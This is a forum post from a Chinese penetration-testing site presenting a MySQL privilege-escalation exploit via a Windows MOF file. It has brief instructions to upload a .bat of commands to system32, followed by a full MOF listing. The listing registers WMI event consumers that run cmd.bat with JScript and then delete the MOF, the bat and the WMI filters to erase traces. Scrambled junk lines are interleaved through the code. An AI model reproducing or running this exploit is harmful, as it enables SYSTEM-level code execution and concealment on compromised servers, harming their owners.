中国网络渗透测试联盟
标题:
Mysql 提权即时无错Mof exp
[打印本页]
作者:
admin
时间:
2013-2-14 00:05
标题:
Mysql 提权即时无错Mof exp
这个sql提权MOF需要运行 system下的文件,不能定义路径。
; s/ a1 l$ I' F3 ]) {
需要将要运行的命令写入到bat上传到system32目录,然后执行。
a% V2 U/ _8 x2 D
3 l9 H; z- _- v3 }1 k5 `/ R" Y
这个sql提权MOF需要运行 system下的文件,不能定义路径。
. E; O) T3 }! h# Y4 C" N9 C
需要将要运行的命令写入到bat上传到system32目录,然后执行。
* e2 r$ Z. _3 X$ ^/ o D
* a4 o5 M) T: C2 b
#pragma
# t- ~9 o3 }( c
namespace("\\\\.\\root\\cimv2")
: H! G; r" e9 L1 s% ?# S! R
class
) @, \5 z# y I3 ^5 e
MyClass547
1 T s8 ?! j$ k7 {' q# b. a6 _. f2 d
{ [key]
3 p1 K4 N, D; j1 E7 w
string
# P- e$ d J- F
Name;
$ O- m+ m/ a& o7 g2 u7 @
};
+ c8 C3 J' Y& _! v* r
class
0 w4 y/ y+ p! Q0 n2 {# _
ActiveScriptEventConsumer
* m8 ^, h1 Q9 _/ |& w8 W. Q. c
: __EventConsumer { [key]
6 c( i& s6 q% y
string
8 ]! r9 ?- l/ Y7 _
Name; [not_null]
2 b7 _) o9 _' L) _" D: Z
string
# i7 k! o, R+ |6 C' c. ^/ G, d6 W& o
ScriptingEngine; string
0 a$ E9 B0 N, G! B4 ?- ?
ScriptFileName; [template]
: ? T2 n0 Y) K; t) ^8 ?
string
0 W' c; J: k2 y# w, B, I+ A+ L8 m
ScriptText; uint32 KillTimeout;
. ~3 P9 ]" B# ?* Y; l1 n
}; instance of __Win32Provider as $P {
, J+ n: `1 u7 s6 B* e5 N& x8 Q
Name
0 ~; H7 u8 [ j
=
1 g# k3 d5 D, }6 U
"ActiveScriptEventConsumer"; CLSID =
# }0 o. C' r7 K4 J* }) \5 ?
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
; C: O- A, N( ]2 H: m% K
PerUserInitialization
2 U2 k9 }1 n4 h6 B F, ?
= TRUE;
7 X9 r! H0 Y7 Y, ?+ y/ {
}; instance of __EventConsumerProviderRegistration { Provider
9 s$ ] @' { z( U; `9 u0 n
= $P; ConsumerClassNames
; R2 O# X7 [" C& C
=
, K% P( E4 ~+ k5 d! }/ L% y( G
{"ActiveScriptEventConsumer"};
7 ~) O3 u' h" n8 B' v' h
};
7 @1 t$ f/ P j4 p( Y( U! m8 ^
Instance of ActiveScriptEventConsumer
0 {$ c# `( U9 E1 G S
as $cons { Name
6 a2 b& D2 ~3 z P' v# p( {
=
. W9 f- E- `& Z: f: S' f' W {# M
"ASEC"; ScriptingEngine
4 s' k# E& y1 S b: O
=
$ S8 O" g2 B: {; h
"JScript"; ScriptText
4 P& r) s- M0 ~
=
+ o2 b( {% A4 C2 `: J
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
l4 S# k' t5 v! M' z- y5 j1 Q
Instance of ActiveScriptEventConsumer
* S) T ?2 w& i6 o! I3 R3 q
as $cons2 { Name
0 Y p: B+ X+ V: s
=
; e3 h+ v' C1 I! h
"qndASEC"; ScriptingEngine
9 ]+ ^; X% j# S3 o, u7 ]' f
=
( ], X+ {5 _0 o& g
"JScript"; ScriptText
% U- \7 W8 z9 J# R4 h# h
=
% R* P6 b. R/ U: w1 W% m
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
' D$ [* @/ E: Z2 \9 a$ W
}; instance of __EventFilter as $Filt { Name
( X/ ]) `! v/ h' k/ X' E# U
=
8 g0 K5 P ?3 H& }& i
"instfilt"; Query
& a8 D n1 t7 h& x) l
=
4 y v. j' ?: S+ o0 v& l m
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
8 e; w& O& Z! A5 Z' i- A
=
7 d+ }4 t, k# T
"WQL"; }; instance of __EventFilter as $Filt2 { Name
! g. ^' }" k( f1 G, Y
=
7 {# k5 a3 s! }2 f4 D$ q( I+ Q
"qndfilt"; Query
- Q6 V, z" t9 f+ L, C' L; o) D
=
3 o+ I* _/ _/ f- o
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
# t. w0 ]0 m0 L% n' r8 W
=
5 e% T3 c. h T/ f$ Y
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
( U3 K- ~; ?6 F u" x: H- ?" A
= $cons; Filter
5 P& _( N( Y e* Q1 \6 ?
= $Filt;
$ |, y9 [+ u( \
}; instance of __FilterToConsumerBinding as $bind2 { Consumer
, u& }& h' T% k* r: l3 Q! J
= $cons2; Filter
0 f" ]! n4 }7 r% G
= $Filt2;
, S2 @4 r, E2 A9 [3 I( p
}; instance of MyClass547
c( p! U# r- K1 l! D! Y
as $MyClass { Name
6 M( s: f; I$ F
=
) S5 i8 _; F0 @2 ^* u5 @; y# g
"ClassConsumer";
n4 G! N; D3 h, o2 d
};
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2